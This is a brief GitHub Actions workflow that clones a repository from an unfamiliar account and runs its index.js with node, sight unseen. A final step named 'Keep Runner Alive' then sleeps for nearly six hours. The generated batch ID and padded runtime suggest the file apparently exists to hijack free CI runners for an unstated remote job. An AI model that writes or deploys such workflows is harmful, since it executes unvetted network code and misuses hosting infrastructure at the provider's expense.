name: Git Tool Runner
# Batch-ID: 1759047330011-0.4914990584708534
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Clone and Run Tool
        run: |
          git clone https://github.com/mamateo0001-droid/tool.git
          cd tool
            node index.js
      - name: Keep Runner Alive
        run: sleep 21000